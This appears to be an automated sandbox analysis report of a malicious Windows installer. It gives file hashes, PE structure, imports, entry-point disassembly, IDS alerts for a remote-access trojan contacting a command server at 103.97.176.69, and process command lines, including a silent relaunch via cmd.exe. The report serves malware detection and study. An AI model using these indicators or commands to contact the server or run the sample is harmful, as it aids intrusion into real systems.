                                                                SHA-256:326F0D47F4941D7F599FEDBA56D2EFD39838BE34ACA5D9C804A01484207966E1
                                                                SHA-512:E8878BDA1C6E13D618E72B19ECE1138DCC1EAA6D4DDFACA63A779565DF5D8F088DC9CEFE498766BC8CD31E267F89CC389460DD7EEB579EF4B52AFB60C4974358
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.0g.4...'....&#...&.,...0...............@........................................&...@... .........................q.......H(..............................,......................................................$............................text....+.......,..................`..`.data........@.......0..............@....rdata..8n...P...p...2..............@..@.eh_fram............................@..@.bss....P................................edata..q............t..............@..@.idata..H(.......*...v..............@....CRT....4...........................@....tls................................@....reloc..,...........................@..B................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\is-SF7GG.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2491219
                                                                Entropy (8bit):6.77069137489322
                                                                Encrypted:false
                                                                SSDEEP:49152:hYXn5erYk9ytmHjj4Kcz8t8yqHYZib5g1IdvkQaXXP8Z0yywVJVjyEtUy:hYXIrYrsjjn9I+ib5V0y/cEtUy
                                                                MD5:72EA5220644A482BF6EE570CB9BD996C
                                                                SHA1:C5E6C482C975CA2A3CE7CFDE9A44A2BD18E69D81
                                                                SHA-256:326F0D47F4941D7F599FEDBA56D2EFD39838BE34ACA5D9C804A01484207966E1
                                                                SHA-512:E8878BDA1C6E13D618E72B19ECE1138DCC1EAA6D4DDFACA63A779565DF5D8F088DC9CEFE498766BC8CD31E267F89CC389460DD7EEB579EF4B52AFB60C4974358
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.0g.4...'....&#...&.,...0...............@........................................&...@... .........................q.......H(..............................,......................................................$............................text....+.......,..................`..`.data........@.......0..............@....rdata..8n...P...p...2..............@..@.eh_fram............................@..@.bss....P................................edata..q............t..............@..@.idata..H(.......*...v..............@....CRT....4...........................@....tls................................@....reloc..,...........................@..B................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.76702659706501
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                • Inno Setup installer (109748/4) 1.08%
                                                                • InstallShield setup (43055/19) 0.42%
                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                File name:eXIHsSYhOX.exe
                                                                File size:2'495'440 bytes
                                                                MD5:9170086e8d746e094ab4fe7444613030
                                                                SHA1:b8afef741c151864c6bffc41a82824e0f51c0b97
                                                                SHA256:982c53771e2f23b29141062b5e2a90bf1588ce4a2dbb559031e7758bd192c8eb
                                                                SHA512:4f67d8ed8f2f4ea0d498c1ed9762a106c2fce4b6dd074b0b46cf901803c50bb0e02542bc2d456132bd9654e67e713831ea0a603feec65cf7cad2ddad1c73b659
                                                                SSDEEP:49152:9wREDDMp3BgWLqWuFvO5pFdOkMgHeXDREnz+d:9wREOBFqWyO5pKkTs0+d
                                                                TLSH:EEC5E023B2CBE13EE45E0B3B05B2B25494FB6A616423BE57D6E484ACCF250501E3F657
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                File Icon

                                                                Icon Hash:2d2e3797b32b2b99

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4a83bc
                                                                Entrypoint Section:.itext
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:1
                                                                File Version Major:6
                                                                File Version Minor:1
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:1
                                                                Import Hash:40ab50289f7ef5fae60801f88d4541fc

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFA4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor eax, eax
                                                                mov dword ptr [ebp-3Ch], eax
                                                                mov dword ptr [ebp-40h], eax
                                                                mov dword ptr [ebp-5Ch], eax
                                                                mov dword ptr [ebp-30h], eax
                                                                mov dword ptr [ebp-38h], eax
                                                                mov dword ptr [ebp-34h], eax
                                                                mov dword ptr [ebp-2Ch], eax
                                                                mov dword ptr [ebp-28h], eax
                                                                mov dword ptr [ebp-14h], eax
                                                                mov eax, 004A2EBCh
                                                                call 00007F254CBCE185h
                                                                xor eax, eax
                                                                push ebp
                                                                push 004A8AC1h
                                                                push dword ptr fs:[eax]
                                                                mov dword ptr fs:[eax], esp
                                                                xor edx, edx
                                                                push ebp
                                                                push 004A8A7Bh
                                                                push dword ptr fs:[edx]
                                                                mov dword ptr fs:[edx], esp
                                                                mov eax, dword ptr [004B0634h]
                                                                call 00007F254CC5FB0Bh
                                                                call 00007F254CC5F65Eh
                                                                lea edx, dword ptr [ebp-14h]
                                                                xor eax, eax
                                                                call 00007F254CC5A338h
                                                                mov edx, dword ptr [ebp-14h]
                                                                mov eax, 004B41F4h
                                                                call 00007F254CBC8233h
                                                                push 00000002h
                                                                push 00000000h
                                                                push 00000001h
                                                                mov ecx, dword ptr [004B41F4h]
                                                                mov dl, 01h
                                                                mov eax, dword ptr [0049CD14h]
                                                                call 00007F254CC5B663h
                                                                mov dword ptr [004B41F8h], eax
                                                                xor edx, edx
                                                                push ebp
                                                                push 004A8A27h
                                                                push dword ptr fs:[edx]
                                                                mov dword ptr fs:[edx], esp
                                                                call 00007F254CC5FB93h
                                                                mov dword ptr [004B4200h], eax
                                                                mov eax, dword ptr [004B4200h]
                                                                cmp dword ptr [eax+0Ch], 01h
                                                                jne 00007F254CC6687Ah
                                                                mov eax, dword ptr [004B4200h]
                                                                mov edx, 00000028h
                                                                call 00007F254CC5BF58h
                                                                mov edx, dword ptr [004B4200h]

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x4830.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xcb0000x48300x4a0041595eb6b70f6cb4398e4ee1256eadddFalse0.30743243243243246data4.556383610024311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xcb4c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                RT_ICON0xcb5f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                RT_ICON0xcbb580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                RT_ICON0xcbe400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                RT_STRING0xcc6e80x3f8data0.3198818897637795
                                                                RT_STRING0xccae00x2dcdata0.36475409836065575
                                                                RT_STRING0xccdbc0x430data0.40578358208955223
                                                                RT_STRING0xcd1ec0x44cdata0.38636363636363635
                                                                RT_STRING0xcd6380x2d4data0.39226519337016574
                                                                RT_STRING0xcd90c0xb8data0.6467391304347826
                                                                RT_STRING0xcd9c40x9cdata0.6410256410256411
                                                                RT_STRING0xcda600x374data0.4230769230769231
                                                                RT_STRING0xcddd40x398data0.3358695652173913
                                                                RT_STRING0xce16c0x368data0.3795871559633027
                                                                RT_STRING0xce4d40x2a4data0.4275147928994083
                                                                RT_RCDATA0xce7780x10data1.5
                                                                RT_RCDATA0xce7880x310data0.6173469387755102
                                                                RT_RCDATA0xcea980x2cdata1.1818181818181819
                                                                RT_GROUP_ICON0xceac40x3edataEnglishUnited States0.8870967741935484
                                                                RT_VERSION0xceb040x584dataEnglishUnited States0.24504249291784702
                                                                RT_MANIFEST0xcf0880x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                                                Imports

                                                                DLLImport
                                                                kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                comctl32.dllInitCommonControls
                                                                user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                                                                Exports

                                                                NameOrdinalAddress
                                                                __dbk_fcall_wrapper20x40fc10
                                                                dbkFCallWrapperAddr10x4b063c

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2025-01-04T01:22:28.745998+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449736103.97.176.69443TCP
                                                                2025-01-04T01:23:33.528707+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.453307103.97.176.69443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 4, 2025 01:22:28.745677948 CET49736443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:28.745713949 CET44349736103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:28.745809078 CET49736443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:28.745997906 CET49736443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:28.746015072 CET44349736103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:28.746071100 CET44349736103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:30.347816944 CET5304653192.168.2.4162.159.36.2
                                                                Jan 4, 2025 01:22:30.352650881 CET5353046162.159.36.2192.168.2.4
                                                                Jan 4, 2025 01:22:30.352705002 CET5304653192.168.2.4162.159.36.2
                                                                Jan 4, 2025 01:22:30.357544899 CET5353046162.159.36.2192.168.2.4
                                                                Jan 4, 2025 01:22:30.798497915 CET5304653192.168.2.4162.159.36.2
                                                                Jan 4, 2025 01:22:30.803453922 CET5353046162.159.36.2192.168.2.4
                                                                Jan 4, 2025 01:22:30.803539038 CET5304653192.168.2.4162.159.36.2
                                                                Jan 4, 2025 01:22:33.731301069 CET53050443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:33.731333971 CET44353050103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:33.731410027 CET53050443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:33.731596947 CET53050443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:33.731612921 CET44353050103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:33.731657982 CET44353050103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:38.700073004 CET53054443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:38.700125933 CET44353054103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:38.700253963 CET53054443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:38.701524019 CET53054443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:38.701536894 CET44353054103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:38.701581001 CET44353054103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:43.701946974 CET53056443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:43.701983929 CET44353056103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:43.705996990 CET53056443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:43.709899902 CET53056443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:43.709914923 CET44353056103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:43.709968090 CET44353056103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:48.700090885 CET53058443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:48.700129986 CET44353058103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:48.700200081 CET53058443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:48.700448036 CET53058443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:48.700463057 CET44353058103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:48.700510025 CET44353058103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:53.670495987 CET53060443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:53.670546055 CET44353060103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:53.670603037 CET53060443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:53.670967102 CET53060443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:53.670978069 CET44353060103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:53.671020031 CET44353060103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:58.669634104 CET53078443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:58.669644117 CET44353078103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:58.669764996 CET53078443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:58.670090914 CET53078443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:22:58.670099974 CET44353078103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:22:58.670145035 CET44353078103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:03.668972015 CET53110443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:03.669014931 CET44353110103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:03.669090986 CET53110443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:03.669302940 CET53110443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:03.669315100 CET44353110103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:03.669359922 CET44353110103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:08.668905020 CET53142443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:08.668927908 CET44353142103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:08.668997049 CET53142443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:08.669255018 CET53142443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:08.669269085 CET44353142103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:08.669305086 CET44353142103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:13.637551069 CET53176443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:13.637581110 CET44353176103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:13.637660027 CET53176443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:13.637864113 CET53176443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:13.637878895 CET44353176103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:13.637917995 CET44353176103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:18.606492996 CET53209443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:18.606527090 CET44353209103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:18.606606960 CET53209443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:18.606848955 CET53209443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:18.606863976 CET44353209103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:18.606909037 CET44353209103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:23.575227022 CET53242443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:23.575257063 CET44353242103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:23.575329065 CET53242443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:23.575563908 CET53242443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:23.575578928 CET44353242103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:23.575644016 CET44353242103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:28.543958902 CET53276443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:28.543992043 CET44353276103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:28.544049978 CET53276443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:28.544307947 CET53276443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:28.544320107 CET44353276103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:28.544359922 CET44353276103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:33.528350115 CET53307443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:33.528377056 CET44353307103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:33.528456926 CET53307443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:33.528707027 CET53307443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:33.528722048 CET44353307103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:33.528759003 CET44353307103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:38.496934891 CET53340443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:38.496942997 CET44353340103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:38.497011900 CET53340443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:38.497219086 CET53340443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:38.497229099 CET44353340103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:38.497268915 CET44353340103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:43.496975899 CET53345443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:43.497035027 CET44353345103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:43.497128963 CET53345443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:43.497360945 CET53345443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:43.497373104 CET44353345103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:43.497427940 CET44353345103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:48.500353098 CET53347443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:48.500399113 CET44353347103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:48.500480890 CET53347443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:48.503521919 CET53347443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:48.503536940 CET44353347103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:48.503577948 CET44353347103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:53.497023106 CET53349443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:53.497059107 CET44353349103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:53.497147083 CET53349443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:53.497344971 CET53349443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:53.497359991 CET44353349103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:53.497411966 CET44353349103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:58.497004986 CET53351443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:58.497040033 CET44353351103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:58.497215986 CET53351443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:58.497412920 CET53351443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:23:58.497438908 CET44353351103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:23:58.497483969 CET44353351103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:24:03.778225899 CET53353443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:24:03.778258085 CET44353353103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:24:03.778332949 CET53353443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:24:03.778506994 CET53353443192.168.2.4103.97.176.69
                                                                Jan 4, 2025 01:24:03.778516054 CET44353353103.97.176.69192.168.2.4
                                                                Jan 4, 2025 01:24:03.778568029 CET44353353103.97.176.69192.168.2.4

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 4, 2025 01:22:30.347326040 CET5361653162.159.36.2192.168.2.4
                                                                Jan 4, 2025 01:22:30.842066050 CET5534253192.168.2.41.1.1.1
                                                                Jan 4, 2025 01:22:30.851059914 CET53553421.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 4, 2025 01:22:30.842066050 CET192.168.2.41.1.1.10xdae2Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 4, 2025 01:22:30.851059914 CET1.1.1.1192.168.2.40xdae2Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\eXIHsSYhOX.exe"
                                                                Imagebase:0x6f0000
                                                                File size:2'495'440 bytes
                                                                MD5 hash:9170086E8D746E094AB4FE7444613030
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe"
                                                                Imagebase:0x3c0000
                                                                File size:3'284'992 bytes
                                                                MD5 hash:E97363B64F37EE24CDD55CEA14D1C564
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 1%, Virustotal, Browse
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

